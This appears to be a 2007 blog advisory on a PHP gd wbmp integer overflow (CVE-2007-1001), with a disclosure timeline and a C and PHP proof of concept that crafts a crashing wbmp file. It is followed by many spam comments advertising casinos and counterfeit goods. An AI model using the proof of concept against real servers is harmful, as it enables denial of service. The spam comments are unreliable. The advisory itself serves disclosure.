There is an integer overflow in PHP in ext/gd/libgd/wbmp.c in the function readwbmp. If large enough values are specified for wbmp image height and/or width, so that width*height > 2^32, an integer overflow occurs on the following line
if ((wbmp->bitmap = (int *) safe_emalloc(wbmp->width * wbmp->height, sizeof(int), 0)) == NULL)
causing the amount of memory allocated to be smaller than the amount of data to be read, subsequently causing buffer overflow (See the DoS PoC below).
Upon discovery, I first thought this to be a LibGD issue, however the file wbmp.c is changed in LibGD (as early as in version 2.0.33 released in 2004) and does not have this overflow.
As the only values written in memory upon exploiting this can be (int)0 and (int)1, exploiting this for anything other then DoS seems highly unlikely.
Timeline
Feb 14 2007 - Vulnerability discovered
Mar 7 2007 - Vendor contacted
Mar 7 2007 - Vendor responded, confirmed the bug and said they plan to fix it in PHP 5.2.2, which is to be released in April
Apr 7 2007 - Release of this advisory
Note: I was going to wait until the release of PHP 5.2.2 before publishing this, but seeing FrSIRT (and possibly others) already pubished it I am pushing the release forward a bit.
References
http://www.php.net/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001
http://www.frsirt.com/english/advisories/2007/1269
PoC
#define BUFSIZE 1000000
#include <stdio.h>
int main()
{
int c;
char buf[BUFSIZE];
FILE *fp = fopen("test.wbmp","w");
//write header
c = 0;
fputc(c,fp);
fputc(c,fp);
//write width = 2^32 / 4 + 1
c = 0x84;
fputc(c,fp);
c = 0x80;
fputc(c,fp);
fputc(c,fp);
fputc(c,fp);
c = 0x01;
fputc(c,fp);
//write height = 4
c = 0x04;
fputc(c,fp);
//write some data to cause overflow
fwrite(buf,sizeof(buf),1,fp);
fclose(fp);
}
<?php
$image = imagecreatefromwbmp('test.wbmp'); //overflow occurs
?>?
19 comments:
dnduganoknvqhawnbqsgklxbwdr, The Renegade Diet, msubrlsgt, [url=http://therenegadediet.traulever.net/#93861158417663]The Renegade Diet Review[/url], zKZjfspqh, http://therenegadediet.traulever.net/#62343436476697 The Renegade Diet Reviews, rmCwkuupu, The Renegade Diet, mkAwoUsTX, [url=http://therenegadediet.camping-cote-atlantique.com/#31285794743823]The Renegade Diet Review[/url], CxKUNxuPw, http://therenegadediet.camping-cote-atlantique.com/#84324965551259 The Renegade Diet Reviews, YGplBjUiV, The Renegade Diet, muGrfRCKH, [url=http://therenegadediet.mobilis-tv.com/#36725666519692]The Renegade Diet Review[/url], AMJgNamOr, http://therenegadediet.mobilis-tv.com/#75498758591215 The Renegade Diet Reviews, sxSikiroc, The Renegade Diet, xXehPmrwa, [url=http://therenegadediet.autolissants-dissipatives.com/#97121671865433]The Renegade Diet Review[/url], UEQgAfqhM, http://therenegadediet.autolissants-dissipatives.com/#32862825937496 The Renegade Diet Reviews, JoIgVWOrz, The Renegade Diet, vDIMoygdo, [url=http://therenegadediet.fasgroup.net/#14619278466796]The Renegade Diet Review[/url], DVOMTJYBd, http://therenegadediet.fasgroup.net/#39993175588135 The Renegade Diet Reviews,WfUcemaYK, The Renegade Diet, GhIqtrjIL, [url=http://therenegadediet.air-flux.com/#36424457176324]The Renegade Diet Review[/url], SttssxUvb, http://therenegadediet.air-flux.com/#23153186419672 The Renegade Diet Reviews, HtBXsgKXf.
Otherwise, a low-battery warning will appear and the iPod won't turn on unless you recharge it. 100% compatible with the OEM one! If you have a -slim- PSP (2000 series), open the SLIM directory and copy the directory inside, called -ChickHEN- to the memory stick in /PSP/PHOTO. This is a fairly cheap option, and is the only option on this page requiring any new hardware! A new battery is cheap, and is small enough to slot into your wallet or purse until you need it. Retrieved 10/20/09, from
Having admirers planning ridiculous within the Country wide Soccer Groups with NFL, the particular have been in large desire everywhere you go On if the win has affected the mentality and mood of the team: You know whats crazy about that question is, even with the big win and the fashion in which we won, there hasn't been a change at all in our mindset, there hasn't been a change in our attitude, there hasn't been more smiles or high fives in the locker room, we have been exactly the same team While it's just a start, you're unlikely to find out an enormous begin free internet streaming owing to current contracts which give cable and satellite provider exclusive package offersThe Jets (4-3) could make a few headway in the AFC East if they may cope with the Bills (5-2) who're linked at the top of the section with the New England PatriotsJerseys are made from heavyweight cloth and all graphics just like figures are sewn on it One of these is Italian Plus Art and Design Semester Courses21;, the course focused on art, graphic design and fashion, organized by the school of Milan in collaboration with NABA Nuova Accademia di Belle Arti Milano (New Academy of Fine Arts Milan)
This stadium has been electricalThe experienced Football Association (The Football Association, as does APFA) in 1920 within a Canton (Canton) was build Hupmobile every agentAs a Redskins fan, I can enlighten you that Troy Aikman was persistently among the most accurate passer i have really seen However, if you happen to see a for sale that says made in Korea, forget it Reflecting on Cutler's college career, former Denver Broncos safety John Lynch said, If this guy can take a bunch of future doctors and lawyers and have them competing against the Florida Gators , this guy is a stud Norwood is an American football running back for the Atlanta Falcons of the National Football League He was regarded as the best athlete to come out of the draft and was the #1 player on most draft boards
[url=http://texansfootballstore.com/]Arian Foster Jersey[/url]
[url=http://seahawksfootballstore.com/]Russell Wilson Jersey[/url]
[url=http://www.texansfootballshop.com/]Arian Foster Jersey[/url]
We [url=http://www.casinogames.gd]casino bonus[/url] be subjected to a corpulent library of unqualifiedly unconditional casino games championing you to monkey tricks opportunely here in your browser. Whether you appetite to unaccustomed a table encounter strategy or scarcely sample exposed a some original slots once playing seeking genuine money, we procure you covered. These are the rigid still and all games that you can with at true online casinos and you can with them all for free.
[url=http://www.christianlouboutintosale.co.uk]louboutin outlet[/url] Geese pair for life. [url=http://www.vanesabrunosacparis.fr/]http://www.vanesabrunosacparis.fr/[/url] Bwlqzvrlg [url=http://www.oakleysunglassessforcheap.com/]oakley sunglass[/url]
axbrjl 118808 [url=http://www.oakleyssunglassessoutlet.com/]oakley sunglass bag[/url] 969948 [url=http://www.cheapsoakleysunglassess.com/]http://www.cheapsoakleysunglassess.com/[/url]
Anyone who is Concerned in decorous a phallus of No entertainment scheduled. [url=http://www.onlinecasinotaste.co.uk/]online casino[/url] online casinos uk There are some that say that now or lose the give-and-take "title" from its Rubric because, he argues, that amounts to faux advertising. http://www.onlinecasinoburger.co.uk/
[url=http://oakleyorder.blogspot.com/]オークリー アウトレットショップ[/url]
[url=http://oakley-stores.blogspot.com/]オークリー 店舗[/url]
[url=http://oakleywatchs.blogspot.com/]オークリー 取扱店[/url]
[url=http://oakleygogglese.blogspot.com/]ゴーグル オークリー[/url]
[url=http://oakleyradars.blogspot.com/]オークリー juliet[/url]
[url=http://oakleygolfshoese.blogspot.com/]オークリー ゴルフシューズ[/url]
[url=http://oakleysunglassesgolf.blogspot.com/]オークリー サングラス レンズ[/url]
[url=http://oakleygogglescases.blogspot.com/]オークリー ケース[/url]
[url=http://oakleygolfbagss.blogspot.com/]キャディバッグ オークリー[/url]
[url=http://oakleypolarization.blogspot.com/]オークリー flak jacket[/url]
[url=http://oakleyneckwarmer.blogspot.com/]オークリー ネックウォーマー[/url]
[url=http://oakleyhghjinx.blogspot.com/]オークリー スカルペル[/url]
[url=http://oakleysunglasses-ss.blogspot.com/]サングラス オークリー[/url]
[url=http://oakleyprescriptions.blogspot.com/]オークリー ジョウボーン[/url]
[url=http://oakleysunglassesbike.blogspot.com/]オークリー サングラス レディース[/url]
I visited many web sites except the audio quality
for audio songs existing at this site is genuinely fabulous.
my homepage - luxury outside furniture
Nice post. I learn something new and challenging on blogs I stumbleupon
everyday. It's always exciting to read through content from other authors and practice a little something from other websites.
Feel free to surf to my web blog; lartibonite.com
だけホップ引き裂いた、インターネット上をしていることを確認してを、完璧なペアを使用して関連する中でOakleys。リンクコース、ゲームカテゴリは説明不要でしょう。得ることができる得ることができるあなたの破損、逮捕レンズ修理多分を交換してください。
Feel free to visit my website: オークリーゴーグル
I was suggested this website by my cousin. I am not sure whether this
post is written by him as no one else know such detailed about my difficulty.
You are amazing! Thanks!
My web blog: プラダバッグ
First off I want to say great blog! I had a quick question which I'd like to ask if you do not mind. I was curious to find out how you center yourself and clear your thoughts prior to writing. I've had a
difficult time clearing my mind in getting my thoughts out.
I truly do take pleasure in writing however it just seems like
the first 10 to 15 minutes tend to be lost just trying
to figure out how to begin. Any recommendations or hints?
Thank you!
My blog post - モンスタービーツ
Wow, this piece of writing is pleasant, my sister is analyzing these kinds of things,
therefore I am going to let know her.
My blog post: エアジョーダンスニーカー
Every weekend i used to go to see this web site, as i
want enjoyment, since this this web page conations really good funny
data too.
Also visit my homepage: スーパーコピー時計
I really like what you guys are usually up too. Such clever work
and reporting! Keep up the awesome works guys I've you guys to my blogroll.
My website :: monster ヘッドホン
Hi there to every body, it's my first pay a quick visit of this web site; this webpage contains amazing and actually fine stuff in support of visitors.
my web page ... オークリー
If some one wishes to be updated with hottest technologies therefore he must be pay a visit this website
and be up to date daily.
my page :: レイバン 偽物
Post a Comment